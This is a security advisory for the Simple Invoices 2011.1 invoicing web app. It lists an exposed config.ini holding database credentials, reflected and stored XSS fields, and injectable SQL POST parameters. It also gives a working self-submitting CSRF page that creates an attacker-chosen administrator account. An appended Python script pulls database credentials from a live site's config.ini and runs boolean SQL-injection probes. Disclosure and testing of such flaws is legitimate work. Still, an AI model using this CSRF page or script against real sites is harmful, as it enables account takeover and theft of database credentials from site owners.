Simple Invoices: http://www.simpleinvoices.org
Version: 2011.1 - stable
By Ross Marks: http://www.rossmarks.co.uk
OSVDB Creditee: http://osvdb.org/creditees/13991-ross-marks

1. Information Disclosure

visit: http://website.com/simpleinvoices/config/config.ini

By default this file is readable by anyone over the web. It holds the
application's configuration, including the database details (host, port,
username and password).

2. Reflected XSS

visit: http://website.com/simpleinvoices/index.php?module=invoices&view=manage&having=<XSS>

Replace <XSS> with your payload. The value is reflected inside JavaScript,
so close that context first (prefix the payload with ;</script>).

3. Persistent XSS

None of the fields below are filtered on input or escaped on output, so the
stored payload fires wherever the record is later displayed.

3.1 visit: http://website.com/simpleinvoices/index.php?module=user&view=add
    create a user with your payload as the username

3.2 visit: http://website.com/simpleinvoices/index.php?module=customers&view=add
    create a customer with your payload as the name

3.3 visit: http://website.com/simpleinvoices/index.php?module=billers&view=add
    create a biller with your payload as the name

3.4 visit: http://website.com/simpleinvoices/index.php?module=invoices&view=itemised
    create an invoice using the name entered in 3.1, 3.2 or 3.3

3.5 visit: http://website.com/simpleinvoices/index.php?module=products&view=add
    create a product with your payload as the product name

3.6 visit: http://website.com/simpleinvoices/index.php?module=payment_types&view=add
    create a payment type with your payload as the description

3.7 visit: http://website.com/simpleinvoices/index.php?module=tax_rates&view=add
    create a tax rate with your payload as the description

3.8 visit: http://website.com/simpleinvoices/index.php?module=preferences&view=add
    create an invoice preference with your payload as the description

4. SQL Injection

4.1 visit: http://website.com/simpleinvoices/index.php?module=invoices&view=xml
    POST: page=1&rp=15&sortname=id&sortorder=desc&query=<SQLi>&qtype=c.name

4.2 visit: http://website.com/simpleinvoices/index.php?module=customers&view=xml
    POST: page=1&rp=25&sortname=name&sortorder=asc&query=<SQLi>&qtype=name

Replace <SQLi> with your payload. The other POST variables (page, rp,
sortname, sortorder, qtype) are injectable as well.

5. CSRF (create admin user)

The user-creation form has no CSRF protection (no token, no origin check).
Get a logged-in administrator to visit a page containing the following; the
form submits itself and creates an enabled administrator account with the
email and password you chose:

<html><head></head><body>
<!-- change these -->
<form method='POST' action='http://website.com/simpleinvoices/index.php?module=user&view=add' >
<input type="text" name="email" value="username_you_want" />
<input type="text" name="password_field" value="password_you_want" size="25" />
<!-- leave these -->
<select name="role"><option value="1">administrator</option></select>
<select name="enabled"><option label="Enabled" value="1" selected="selected">Enabled</option></select>
<input type="hidden" name="op" value="insert_user" />
<button type="submit" class="positive" name="submit" value="Insert User"></button>
</form>
<!-- forms[0].submit is the button named "submit", so click() posts the form with the button's value included -->
<script>document.forms[0].submit.click();</script>
</body></html>
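The script below is an added example, written for this page; it is not part of Ross Marks' advisory or of the Simple Invoices code. It turns findings 1 and 4 into repeatable checks: it parses a served config.ini for database credentials (assuming a Zend_Config-style INI with database.params.* keys, which the advisory does not state), and it sends the 4.1 flexigrid POST twice with payloads whose only difference is a true/false tail (assuming query lands inside a quoted LIKE pattern) and compares the <total> row counts in the XML replies (flexigrid's layout, also an assumption). SAMPLE_INI and the SAMPLE_XML_* replies are constructed so the parsing logic runs offline; check_site() is the only part that touches the network.

```python
import configparser
import sys
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Finding 1. Assumption: config.ini is a Zend_Config-style INI whose database
# settings are database.params.* (the advisory only says host/port/user/password).
DB_KEYS = ("database.params.host", "database.params.port",
           "database.params.username", "database.params.password")

# Constructed sample in that assumed layout, used by the offline checks.
SAMPLE_INI = """\
[development]
database.params.host = "localhost"
database.params.port = "3306"
database.params.username = "simple_invoices"
database.params.password = "s3cret"
[production : development]
database.params.password = "pr0d-s3cret"
"""

def parse_db_credentials(ini_text):
    """{section: {key: value}} for every database.params.* key; {} if the text
    is not INI at all (e.g. an HTML error page served with status 200)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(ini_text)
    except configparser.Error:
        return {}
    found = {}
    for section in cp.sections():
        creds = {k: v.strip('"') for k, v in cp.items(section) if k in DB_KEYS}
        if creds:
            found[section] = creds
    return found

def config_exposed(status, body):
    """Finding 1 is confirmed when the file is served and carries DB settings."""
    return status == 200 and bool(parse_db_credentials(body))

# Finding 4. Assumption: `query` lands inside a quoted LIKE pattern, so payloads
# differing only in a true/false tail change the row count in the reply.
TRUE_PAYLOAD = "%' AND '1'='1"
FALSE_PAYLOAD = "%' AND '1'='2"

# Constructed replies in flexigrid's XML layout (assumed: <total> = matching rows).
SAMPLE_XML_TRUE = ('<?xml version="1.0" encoding="utf-8"?><rows><page>1</page><total>42'
                   '</total><row id="1"><cell><![CDATA[Acme]]></cell></row></rows>')
SAMPLE_XML_FALSE = '<?xml version="1.0" encoding="utf-8"?><rows><page>1</page><total>0</total></rows>'

def flexigrid_post_body(query, qtype, sortname="id", sortorder="desc", page=1, rp=15):
    """POST body from 4.1/4.2; put the payload in sortname/sortorder instead to
    probe the ORDER BY fields the advisory also lists as injectable."""
    return urllib.parse.urlencode({"page": page, "rp": rp, "sortname": sortname,
                                   "sortorder": sortorder, "query": query, "qtype": qtype})

def total_rows(xml_text):
    """Row count from a flexigrid XML reply, or None if it is not such a reply."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    try:
        total = ET.fromstring(data).findtext("total")
    except ET.ParseError:
        return None
    return int(total) if total is not None and total.strip().isdigit() else None

def boolean_sqli_indicated(total_true, total_false):
    """The TRUE tail returning more rows than the FALSE tail indicates injection."""
    return None not in (total_true, total_false) and total_true > total_false

def fetch(url, data=None, timeout=10):
    """GET, or form POST when data is given; returns (status, body).
    No session handling: add a Cookie header if the install requires login."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"} if data else {}
    req = urllib.request.Request(url, data=data.encode() if data else None, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")

def check_site(base):
    """Run findings 1 and 4.1 against a live install (base ends in /simpleinvoices)."""
    status, body = fetch(base + "/config/config.ini")
    results = {"config_ini_exposed": config_exposed(status, body),
               "db_credentials": parse_db_credentials(body) if status == 200 else {}}
    totals = {}
    for label, payload in (("true", TRUE_PAYLOAD), ("false", FALSE_PAYLOAD)):
        st, reply = fetch(base + "/index.php?module=invoices&view=xml",
                          flexigrid_post_body(payload, "c.name"))
        totals[label] = total_rows(reply) if st == 200 else None
    results["invoices_xml_sqli"] = boolean_sqli_indicated(totals["true"], totals["false"])
    return results

if __name__ == "__main__":
    print(check_site(sys.argv[1].rstrip("/")))
```

Run it as `python check_si.py http://website.com/simpleinvoices`. The boolean pair is deliberately non-destructive (it only changes how many rows come back), and a 200 that parses to zero credentials means the server returned something other than the INI file, not that the file is safe. The same total_rows() comparison works for 4.2 by posting to the customers XML view with qtype=name, sortname=name and rp=25.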